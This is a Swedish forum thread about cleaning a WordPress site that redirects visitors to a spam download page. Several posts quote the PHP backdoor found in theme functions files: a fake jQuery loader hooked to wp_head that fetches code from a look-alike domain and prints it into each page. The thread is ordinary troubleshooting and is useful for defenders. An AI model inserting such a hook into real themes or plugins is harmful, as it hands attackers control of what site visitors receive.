Forum Mjukvara Programmering och digitalt skapande Tråd Inlägg

wordpress sida infekterad

1
Skriv svar
Permalänk
Medlem

wordpress sida infekterad

Min sida har nu lyckats bli infekterad av någon mysko malware...

Då och då blir min site redirectad till följande sida:

www downloadmusicfreenow com

Någon som har koll på vart jag ska börja för att bli av med skiten?

Felsökning på wordpress sida? i vilken ände börjar jag för att lokalisera vart fulkoden ligger?
Verkar ju ha något med Jquery skript att göra, eller har den satt sig i mian php filer också?
Verkar inte hitta någon info via Google om denna downloadmusicfreenow infektion...

Körde en site scan Sucuri: http://sitecheck.sucuri.net/results/www.tornedalen.se

Visa signatur

http://copykat.se

Redigera
Citera flera Citera
Permalänk
Medlem

Du har råkat ta jquery från nån fuldomän. Se till att ta senaste från jquery.org, INTE jquerys.org

Redigera
Citera flera Citera
Permalänk
Medlem
Skrivet av orbinski:

Du har råkat ta jquery från nån fuldomän. Se till att ta senaste från jquery.org, INTE jquerys.org

Gå till inlägget

Hur menar du med tagit från fuldomän? har inte lagt in något manuellt på egen hand. Men därimot installerat en del plugins som använder sig av det.

Har storrensat bland plugins och nu verkar redirecten sluta för nu... fast man ska ju inte le för tidigt när det kommer till malware...

Hittade även 2 användare som inte hörde hemma på min sida, men dem hade ingen "roll" satta. weird....

Hittade även 2 plugins som jag är rätt säker att jag installerat någon gång på siten men haft inaktiverade nu vart aktiverade, så jag avinstallerade dem, kan vara bovar?.

Hur viktigt är det att jag bör ändra lösenord kopplade till sajten? risk för att dem blivit hijackade?

Senast redigerat
Visa signatur

http://copykat.se

Redigera
Citera flera Citera
Permalänk
Medlem

Om det är wordpress som blivit infekterat (Finns ett gäng säkerhetshål i wp) så se till att ha den senaste versionen av wp. Det finns såkallade crawlbots som söker igenom webben efter just wordpressäkerhetshål. Kolla i dina loggar så ska du nog se att det finns spår av sådana.

Visa signatur

Programmers.se

Redigera
Citera flera Citera
Permalänk
Medlem

Några av mina Wordpressbloggar började också (helt plötsligt, men samtidigt) att skicka vidare folk till en spam-sida. Gemensamt med bloggarna är samma tema. Koden som jag kommenterat bort i functions-filen var boven i dramat verkar det som:

// Load custom libraries used in theme
if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){

/* if (function_exists('curl_init')){
$url="http://www.jqueryc.com/jquery-1.6.3.min.js";$ch = curl_init();$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;
}
*/

}add_action('wp_head', 'insert_jquery_theme');} $cudazi_libraries =
array(
'themesetup',
'theme-options',
'debug',
'filters',
'shortcodes',
'widget-areas',
'featuredimages',
'meta-boxes',
'custom-post-types',
'comments',
'plugins/cudazi-twitter-widget',
'plugins/cudazi-bio-widget'
);
foreach( $cudazi_libraries as $library ) {
include_once( 'libraries/' . $library . '.php' );
}

Redigera
Citera flera Citera
Permalänk
Medlem
Skrivet av Ree_Tab:

Några av mina Wordpressbloggar började också (helt plötsligt, men samtidigt) att skicka vidare folk till en spam-sida. Gemensamt med bloggarna är samma tema. Koden som jag kommenterat bort i functions-filen var boven i dramat verkar det som:

// Load custom libraries used in theme
if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){

/* if (function_exists('curl_init')){
$url="http://www.jqueryc.com/jquery-1.6.3.min.js";$ch = curl_init();$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;
}
*/

}add_action('wp_head', 'insert_jquery_theme');} $cudazi_libraries =
array(
'themesetup',
'theme-options',
'debug',
'filters',
'shortcodes',
'widget-areas',
'featuredimages',
'meta-boxes',
'custom-post-types',
'comments',
'plugins/cudazi-twitter-widget',
'plugins/cudai-bio-widget'
)
foreach( $cudazi_libraries as $library ) {
include_once( 'libraries/' . $library . '.php' );
}

Gå till inlägget

Ok. Så vad jag ska fokusera på att leta efter är skumma adresser till jquery siten i första hand.

Skickades från m.sweclockers.com

Visa signatur

http://copykat.se

Redigera
Citera flera Citera
Permalänk
Medlem

Hej,
ledsen för sent svar, jag skrev från mobilen förra gången. Sök igenom alla filer efter: http://www.jquerys.org/ajax/libs/jquery/jquery-1.6.3.min.js så borde du kunna skaka fram vilken plugin det är som fular sig med lite tur. Det är i den filen som redirecten ligger.

Redigera
Citera flera Citera
Permalänk
Medlem
Skrivet av orbinski:

Hej,
ledsen för sent svar, jag skrev från mobilen förra gången. Sök igenom alla filer efter: http://www.jquerys.org/ajax/libs/jquery/jquery-1.6.3.min.js så borde du kunna skaka fram vilken plugin det är som fular sig med lite tur. Det är i den filen som redirecten ligger.

Gå till inlägget

Hej igen.
Segar lika mycket, nu har jag hunnit kika genom massa kod på min sida. Vad som dyker upp ofta är denna kod.

// load config
if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url="http://www.jqueryc.com/jquery-1.6.3.min.js";$ch = curl_init();$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');} require_once(dirname(__FILE__).'/config.php');

Är denna kod skadlig och ska tas bort?

edit: den ligger även i min functions fil...

Senast redigerat
Visa signatur

http://copykat.se

Redigera
Citera flera Citera
1
Skriv svar
Senaste nyheterna
Hårdvara
Mjukvara
Övrigt
Nytt i forumet
Datorkomponenter
System
Ljud, bild och kommunikation
Spel och mjukvara